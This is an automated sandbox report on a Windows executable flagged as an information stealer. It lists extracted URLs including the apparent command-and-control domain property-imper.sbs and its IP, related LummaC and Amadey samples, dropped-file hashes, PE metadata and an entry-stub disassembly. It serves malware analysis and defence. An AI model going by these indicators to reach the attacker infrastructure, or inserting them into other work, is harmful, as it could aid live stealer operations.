                                                https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiaspnet_regiis.exe, 00000002.00000003.1775310035.0000000004BFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://x1.c.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://x1.i.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installaspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.microsofaspnet_regiis.exe, 00000002.00000003.1731740518.0000000004C4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://property-imper.sbs/Uaspnet_regiis.exe, 00000002.00000003.1878990637.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesaspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://property-imper.sbs/BW#?06aspnet_regiis.exe, 00000002.00000003.1878990637.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://property-imper.sbs/api;aspnet_regiis.exe, 00000002.00000003.1879281479.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1879487275.00000000006FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      104.21.33.116
                                                                      property-imper.sbsUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1561496
                                                                      Start date and time:2024-11-23 15:09:06 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 6m 15s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:10
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:S#U043eftWare.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:SftWare.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@5/7@1/1
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 76%
                                                                      • Number of executed functions: 20
                                                                      • Number of non-executed functions: 50
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: S#U043eftWare.exe
                                                                      TimeTypeDescription
                                                                      09:10:01API Interceptor8x Sleep call for process: aspnet_regiis.exe modified
                                                                      09:10:28API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      104.21.33.116Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                        Aura.exeGet hashmaliciousUnknownBrowse
                                                                          injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                        Script.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          property-imper.sbsCall 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.33.116
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.162.84
                                                                                          Aura.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.33.116
                                                                                          injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.33.116
                                                                                          loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.162.84
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.33.116
                                                                                          file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                          • 104.21.33.116
                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.33.116
                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                          • 172.67.162.84
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.162.84
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          CLOUDFLARENETUSCall 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.33.116
                                                                                          arcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.155.47
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.223.140
                                                                                          unturnedHack.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                          • 104.26.13.205
                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.70.128
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.162.84
                                                                                          xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.155.47
                                                                                          Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.198.61
                                                                                          Aura.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.33.116
                                                                                          injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.88.250
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          a0e9f5d64349fb13191bc781f81f42e1Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.33.116
                                                                                          arcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.33.116
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.33.116
                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.33.116
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.33.116
                                                                                          xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.33.116
                                                                                          Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.33.116
                                                                                          Aura.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.33.116
                                                                                          injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.33.116
                                                                                          injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.33.116
                                                                                          No context
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):65536
                                                                                          Entropy (8bit):0.9898611254275596
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:P7taEKfQZkd0BU/KaGpezuiFNZ24IO8V7:jtaEKo2eBU/KahzuiFNY4IO8V
                                                                                          MD5:76A1DE94EFE9C66F7E2BBAEEF99A3C1D
                                                                                          SHA1:E8DCC47A6CF618BF44A7802D3DE30DB3A90D8E6C
                                                                                          SHA-256:4892BA9CA99ACAB40D70D26969CDB23D6E140079CFA121AF354A30D90642E0D8
                                                                                          SHA-512:E10DC683EB326555705744C76596B0546D430F9D6590E77F8C4ED5612E784F01D86DF2A0C3502FFD69A15B8520CD9EC79AE71A180C67F362BC105F11EDF5FF13
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.4.4.5.9.9.0.1.2.7.2.4.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.4.4.5.9.9.5.4.3.9.8.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.1.1.f.8.4.f.a.-.a.e.d.9.-.4.b.d.6.-.a.9.f.e.-.1.d.9.e.e.9.a.c.4.0.8.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.d.2.9.3.3.4.-.2.2.a.6.-.4.f.0.b.-.9.e.2.3.-.9.6.9.3.3.b.3.6.c.b.d.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.#.U.0.4.3.e.f.t.W.a.r.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.X.e.n.i.a.R.u.b.y.E.l.e.a.n.o.r...f.I.M.m.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.c.8.-.0.0.0.1.-.0.0.1.4.-.b.7.b.b.-.b.7.6.0.b.1.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.f.5.e.9.4.7.3.d.b.2.6.e.5.d.d.8.0.0.f.7.8.0.b.0.
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Mini DuMP crash report, 15 streams, Sat Nov 23 14:09:59 2024, 0x1205a4 type
                                                                                          Category:dropped
                                                                                          Size (bytes):191160
                                                                                          Entropy (8bit):3.4283943147095934
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:oPQjFpN4uE2aOtZxAYLTgTDFRCuO4ADCDTZEzNUV:oPs54uEqtHAYLTg/F0uOgtEB
                                                                                          MD5:3345189ABEC6911F7D5524C57EE97770
                                                                                          SHA1:F3F7C3A850B4143BCCBCA8C3D299F4240A0B23D3
                                                                                          SHA-256:6CA44176FE24004933A8D0AD3CCDBF9D81CA9BBE7F55F2092EBF926D6E7C4D0C
                                                                                          SHA-512:CDF32F9B78FB2C922537511CA492429FF25B8CD7E2A5CFC2E961EC446B6472A92C66D0DE0D6E3FCA456DFC1F1AAD6A368539244CC350E96EFE05B2672282F1B1
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:MDMP..a..... .......7.Ag............D...............X.......$................J..........`.......8...........T...........00..............,............ ..............................................................................eJ....... ......GenuineIntel............T...........5.Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8434
                                                                                          Entropy (8bit):3.7045973995476396
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:R6l7wVeJ6S6d6Y9pSU2Wy0gmfZ3YPdprr89b3wsfJdm:R6lXJf6d6YjSUJBgmfJYU3DfK
                                                                                          MD5:6E53741D3A5BC0244C7F95A53EF648C7
                                                                                          SHA1:6D0C65B606751E3C819AA5AB7ADDD81B1C0CB836
                                                                                          SHA-256:76E18F256F9C412C9035A519F8A51EADCFF6D9E84918CAF5D358CCE07C268CDC
                                                                                          SHA-512:A70861BB8D7572C04337A90AB4726FF1EC81360376B25144BC21784518A1102EB9E3243CF1C3344923E1F7F4EFBD9C60E1E87EAB1B544C0BFF3F1F3B0F55752E
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.2.4.<./.P.i.
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4799
                                                                                          Entropy (8bit):4.535455551350094
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cvIwWl8zsOJg77aI9LjEWpW8VYRYm8M4Jo2FVX+q8v4p3nyNnl5Ud:uIjfEI7dd7VhJtKy3u5Ud
                                                                                          MD5:CD544203E8E5F5A5E838BC5D47E6D0CB
                                                                                          SHA1:9CC240C8A4B4AC6738A3457BD6B396253E1C9F76
                                                                                          SHA-256:F51DB96EE6CC861FD798CA667A3736B7E72F5CAD2C5295C44E07917463AB0D37
                                                                                          SHA-512:5E0058DD7FB129EFAB49463DDB19FE871955CF11707DAB14FBCED64D33BAE4E5B3C28E40727BD74E7EC65CB2FB121B356E1A0D7F5CE375E68FF16AD813240D91
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600792" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                          Process:C:\Users\user\Desktop\S#U043eftWare.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):454144
                                                                                          Entropy (8bit):7.119056743566476
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:iN1LbUQPhvt/au1HprNUd0eS1xrNWRym1maND2q4R3xJvS3sMGTyLWmRcwWByNZF:iN10QPD/au1HprNUd0eS1xrNWRym1maU
                                                                                          MD5:68EDC35FED02EDABDE88782166A49CCA
                                                                                          SHA1:4E6ECF76FC091070E3705C9D4E8769109DB8D862
                                                                                          SHA-256:2CF8796216C2968E679698CCE0D7470B12BD16EEE6F3BFD7DC2BA2AB163E4B80
                                                                                          SHA-512:F28039DD6BBDD01C81CB65FB9E371894317D93FE5F16EC919402EBF1538B908067EE5285E61C2BF455479936522C4EC19440DB8DA9D68F497CB898DE7310043A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Reputation:low
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L.....Ag...........!.........P............................................... ............@.............................|.......P...............................`...\...............................x...@...............T............................text.............................. ..`.rdata...\.......^..................@..@.data........ ......................@....reloc..`...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                          Category:dropped
                                                                                          Size (bytes):1835008
                                                                                          Entropy (8bit):4.466090389373905
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:MIXfpi67eLPU9skLmb0b4QWSPKaJG8nAgejZMMhA2gX4WABl0uNMdwBCswSbNp:xXD94QWlLZMM6YFHC+Np
                                                                                          MD5:77D8F1EC2D0184CF6054B6F833149AAB
                                                                                          SHA1:283F0688574EE80761C3236194928A3CFAED99E7
                                                                                          SHA-256:A7342034DA03D36DA8E49970CBAF07541C4FDE133F4A3476CD84A614C7173835
                                                                                          SHA-512:037215770DCBAC5B75A7AEB69BDDC7A89B1E7D668646835B08BB308C594EE9BA6048E8214604C3D37D390612B1DF6F5502FD3A2EE793C38162EA9B527417D7AE
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..Xa.=...............................................................................................................................................................................................................................................................................................................................................9OU........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\Desktop\S#U043eftWare.exe
                                                                                          File Type:ASCII text, with very long lines (352), with CRLF, LF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1413
                                                                                          Entropy (8bit):4.534597972445573
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:7v74NuUMvXIUn2p/kpgw4r22Drrb2nknlusDp:7T4ZMff2p8p14nrPKktp
                                                                                          MD5:C7192E00B6554D10CE1622A1C93BBEC7
                                                                                          SHA1:0443E59CDBA53D4E84A5130C0EB48D5F36967382
                                                                                          SHA-256:0FF48E386C976BA10A6AB7CA6FB93A7278F97DF57FB7D9A01EABDCFAB3641077
                                                                                          SHA-512:9A849C1A402D5C86D3B69AD58010CF1FAD088A40CBCC9F882ADD4286FBC110A7B1AB6AFF5B2C4BEA59EEF3FABCBFDBB45E7649C974355F25ED87C9F879B811E3
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "XeniaRubyEleanor" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetStri
                                                                                          File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.76085746804744
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:S#U043eftWare.exe
                                                                                          File size:707'072 bytes
                                                                                          MD5:82c56f5e8dcae969405b4f02be0d785a
                                                                                          SHA1:f5e9473db26e5dd800f780b02ccf15e7a66d0d48
                                                                                          SHA256:d37859bc3d96d9dd1304fcb56a9e7225a31fa922e7b4945e7bb18e79fa09256c
                                                                                          SHA512:4a1cf38e79d0963f15e07d7be8fb123ead007bf0e0b3d71aab74710e8cb1d80ef7e308d9d2f82f93dc9f0b2e6c7c6775b6c162ae8f86f4e7b23b5cafaa6024fa
                                                                                          SSDEEP:12288:8OMZutCCSy9u5Igbmxj/0e0kfK3bCKoGjTGFcTwFOVT50mc4w67pUnO+IQlmIOE/:8OKSRzh0e0UK3+0TOOVTmmc4+
                                                                                          TLSH:38E47CDC726072DFC867D472DEA81CA8FA91747B931B4213942706EDAA1D897CF190F2
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag..............0..............@....... ....@.. .......................`............@................................
                                                                                          Icon Hash:90cececece8e8eb0
                                                                                          Entrypoint:0x4b400a
                                                                                          Entrypoint Section:
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows cui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x6741CBEF [Sat Nov 23 12:34:55 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                          Instruction
                                                                                          jmp dword ptr [004B4000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
